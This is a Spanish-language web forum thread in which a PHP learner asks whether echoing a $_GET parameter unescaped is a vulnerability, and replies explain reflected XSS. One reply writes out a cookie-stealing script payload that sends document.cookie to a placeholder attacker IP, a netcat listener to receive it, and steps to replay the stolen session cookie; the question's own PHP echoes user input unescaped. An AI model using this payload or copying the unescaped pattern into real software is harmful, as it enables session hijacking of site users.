[Pregunta]: ¿Acarrea alguna vulnerabilidad?

Iniciado por Leguim, 19 Diciembre 2019, 15:30 PM

0 Miembros y 1 Visitante están viendo este tema.

Leguim

Buenos días,

tengo la siguiente duda y es que no se muy bien si hacer esto acarree algún tipo de vulnerabilidad.

Código (php) [Seleccionar]

<?php
$variable 
$_GET['variable'];
?>


<form method="post">
<button type="submit" name="mostrar">enviar</button>
</form>

<?php
if(isset($_POST['mostrar']))
{
echo $variable;
}
?>



Hasta acá nada raro pero lo que hago hasta ahora es que por "miedo" a que exista alguna vulnerabilidad en el proceso de abajo vuelvo a definir la variable $variable así.

Código (php) [Seleccionar]

<?php
$variable 
$_GET['variable'];
?>


<form method="post">
<button type="submit" name="mostrar">enviar</button>
</form>

<?php
if(isset($_POST['mostrar']))
{
        
$variable $_GET['variable'];
echo $variable;
}
?>




(No traten de buscarle sentido o alguna lógica a el programa es solamente de demostración, por ejemplo un formulario de alguna busqueda que reciba algun dato $_GET y que por esa duda de vulnerabilidad vuelvo a definir cuando el usuario realiza alguna petición)

Tengo noción de que hay que "limpiar" ese dato $_GET antes de pasarlo a una variable tal y como esta, es solo un ejemplo.

engel lex

pueden hacerte una inyeccion reflejada, no te afecta a ti, pero si a usuarios incautos...

si el link pasas

url...com/?variable=nuestra+empresa+informa+que+usted+es+estupido

mostrará eso... y mucha gente cae... antes hasta los periodicos salian "defacearon X pagina, violaron a su seguridad y a sus dueños"
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Leguim

Cita de: engel lex en 19 Diciembre 2019, 15:47 PM
pueden hacerte una inyeccion reflejada, no te afecta a ti, pero si a usuarios incautos...

si el link pasas

url...com/?variable=nuestra+empresa+informa+que+usted+es+estupido

mostrará eso... y mucha gente cae... antes hasta los periodicos salian "defacearon X pagina, violaron a su seguridad y a sus dueños"

Lo que hago para eso (aunque no tenía noción) es validarlo, si en principio yo espero que el dato sea int, string, etc, también si es string que tenga un max de caracteres...

Volviendo a eso, esto de "inyección reflejada" ¿es solamente para decirle a el usuario un "mensaje falso" más allá de que esa variable puede ser usada como parámetro en una función, el único peligro real sería ese... ¿no? más allá de si se creen que los llame estúpidos xD... ¿no existiría una vulnerabilidad y no haría falta definir otra vez la variable como hice antes?

engel lex

si apropiadamente está limpia de posibles de codigo html es segura en general
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

AlbertoBSD

Cita de: MiguelCanellas en 19 Diciembre 2019, 15:57 PM
Volviendo a eso, esto de "inyección reflejada" ¿es solamente para decirle a el usuario un "mensaje falso" más allá de que esa variable puede ser usada como parámetro en una función, el único peligro real sería ese... ¿no? más allá de si se creen que los llame estúpidos xD... ¿no existiría una vulnerabilidad y no haría falta definir otra vez la variable como hice antes?

Podrias pasarme el URL de tu WEB, esto con fines didactios...
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

@XSStringManolo

No hagas echo de una variable que pueda contener html, javascript. No te van a enviar un mensaje, usted es estúpido. Lo que van a hacer es mínimo robarte las cookies. Pero pueden meterte una shell o realizar ataques muy avanzados pudiendo tomar el control total de tu equipo.

Tengo hecho un generador de exploits para esa vulnerabilidad. https://github.com/StringManolo/RXSSGen


MinusFour

Volver a asignar el mismo valor a la variable no sirve de nada si ese mismo valor que estás asignando no es de una fuente segura. Es como si le preguntarás a alguien su nombre y para estar seguros de que su nombre es como dice él... le vuelves a preguntar su nombre.

animanegra

Cita de: MiguelCanellas en 19 Diciembre 2019, 15:57 PM
Lo que hago para eso (aunque no tenía noción) es validarlo, si en principio yo espero que el dato sea int, string, etc, también si es string que tenga un max de caracteres...

Volviendo a eso, esto de "inyección reflejada" ¿es solamente para decirle a el usuario un "mensaje falso" más allá de que esa variable puede ser usada como parámetro en una función, el único peligro real sería ese... ¿no? más allá de si se creen que los llame estúpidos xD... ¿no existiría una vulnerabilidad y no haría falta definir otra vez la variable como hice antes?

¿Validas en cliente o en servidor? Ten en cuenta que toda variable $_GET $_POST y algunas de las variables de $_SERVER deben de limpiarse en el PHP para poder usarlas de forma segura antes de utilizarlas. (En general cualquier cosa que venga del usuario)

En tu caso,por ejemplo si te pueden meter como valor de variable:


<img src="" id="lalala"></img><script> lalala.src="http://IP_atacante:54471/"+document.cookie; </script>


Y si ponen un servidor a escuchar en la IP del atacante, por ejemplo con un netcat:


nc -l -p 54471


Desde el equipo a la escucha podrían obtener la cookie de sesion, e impersonar al que ha pinchado al URL. (O ha visitado la página si es persistente.)

Despues el usuario no tiene mas que visitar la pagina, poner la consola de javascript y poner en ella:


document.cookie=COOKIE_COPIADA



No se si se entiende. :\

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

AlbertoBSD

#8

  • Le pueden robar la cookie al usuario afectado (Con la misma podrias acceder a la cuenta del usuario y ver sus datos personales)
  • Puede realizar cualquier acción que el usuario pueda hacer desde el pagina, Ejemplo cambiar informacion, eliminar información (Dependiendo de los formularios y funciones disponibles en el navegador y/o javascript)
  • Ver cualquier información que el usuario es capaz de ver.
  • Lanzar ataques de denegación de servicios, a webs de terceros.
  • Iniciar ataques mas AVANZADOS dependiendo de la versión del navegador
  • Incluyendo la capacidad de no solo Congelar el Navegador.
  • Explotar vulnerabilidades en el navegador.
  • Descargar archivos.
  • Explotar vulnerabilidades del sistema Operativo.
  • Descargar CryptoLockers virus y/o cualquier otra burrada
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

Leguim

Una banda de respuestas  :xD pero no hacia falta todo eso, yo decía si acarreaba una vulnerabilidad no volver a definir x variable en este caso $_GET

Respondiendo: La aplicación web está en desarrollo por eso no tengo una URL que mandarles para que la vean.

A lo que iba era digamos que yo tengo un comentario que quiero editar, yo me ilustro o imagino que hay como "2 procesos" el "protocolo de seguridad entrante" y el "protocolo de seguridad de envío" (esto me lo invente yo  :xD por si les suena raro)

Bueno el protocolo de seguridad entrante se va a encargar de validar si el usuario tiene permisos para ingresar a x pagina.php

Por ejemplo si el usuario tiene la session iniciada, si el usuario no está bloqueado, si el usuario tiene el email verificado, entre tantas otras que pueda tener una aplicación... dependiendo el caso va a redireccionarlo a otras paginas... por ejemplo si no tiene la session iniciada lo manda a el index pero si si tiene la session iniciada pero esta baneado lo mando a ban.php y así hasta completar todos los protocolos.

Después está el protocolo de seguridad de envío que es cuando un usuario envía un formulario... Generalmente van a compartir el mismo protocolo pero con una diferencia y es que el protocolo de envío va a preguntar si la $session_id es igual a $_SESSION['id_user']

hay les explico (me va a salir tremendo texto bíblico pero así se entiende xD)

Ejemplo:

Código (php) [Seleccionar]

// protocolo de seguridad entrante
[Si hay sessión iniciada]
     -> [Si usuario no esta bloqueado]
           -> [Se mantiene a el usuario en la pagina]
                [Creo una variable $session_id que va a tener el valor de $_SESSION['id_user']
     [Si no: mando -> ban.php]
[Si no: mando-> index.php]


Imaginen que una persona tiene abierto una pagina comentar.php que requiere que el usuario tenga una session inciada pero ese mismo usuario abre otra pagina comentar.php, hay ahora 2 pestañas abiertas con el mismo fichero... ahora en la primer pestaña va a cerrar su sesión por lo que lo va mandar a el index pero recordemos que dejó abierta otra donde se ve la pagina como si tuviera la sesión todavía iniciada, gracias a el protocolo de envío lo que va a hacer es que cuando el usuario que tiene una pagina abierta que requiere tener la sessión iniciada pero no la tiene lo que va a hacer es redirigirlo cuando intente usar el formulario...

Ahora gracias a session_id lo que va a hacer es que imaginemos ahora que el usuario tiene 2 cuentas, y abre esas 2 pestañas con el mismo fichero php cierra la sesión en una, pero le quedo la otra abierta y vuelve a ingresar a otra cuenta diferente pero ahora tenemos (1). comentar.php con una cuenta (X) y tenemos comentar.php con una cuenta (Y) ...

el protocolo de envio se va a quedar corto porque si va  a detectar que hay una session abierta, no puede decir si es la misma de antes pero si que hay una... entonces con session id lo que hago es compararlas

$session_id == $_session['id_user'] ?

Lo que trato de mostrar con esto (igual ya deben saber) es que cuando el usuario use el formulario van haber datos que se van a "actualizar" que no van a seguir siendo iguales...

Código (php) [Seleccionar]

<?php
$comentarios 
comentarios::Mostrar_Comentarios(); // Muestra todos los comentarios
$comentarios count($comentarios); // contamos todos los registros

echo $comentarios// hay 3 comentarios
?>


Ahora imaginemos cuando el usuario manda un formulario

<?php
if(isset($_POST['ver_otravez']))
{
     
$comentarios comentarios::Mostrar_Comentarios(); // Muestra todos los comentarios
     
$comentarios count($comentarios); // contamos todos los registros

     
echo $comentarios// capaz acá pueda mostrar 4 o 5 o capaz menos comentarios, 2 comentarios... porque desde que yo abro la pagina hasta que yo mando un formulario pueden mostrarse datos diferentes (actualizados)

     
Si yo acá no volvía a definir la variable $comentarios se iba a quedar con un valor viejo que era el 3
}
?>



A eso iba cuando preguntaba si tenia que volver  a definir variables cuando envío el formulario... por ahí un $_GET no se puede actualizar de otra forma que no sea cambiandolo y recargando la pagina por eso preguntaba...
Yo se que es un poco dificil de entender, más que nada no porque sea dificil sino porque explico para la mrd xD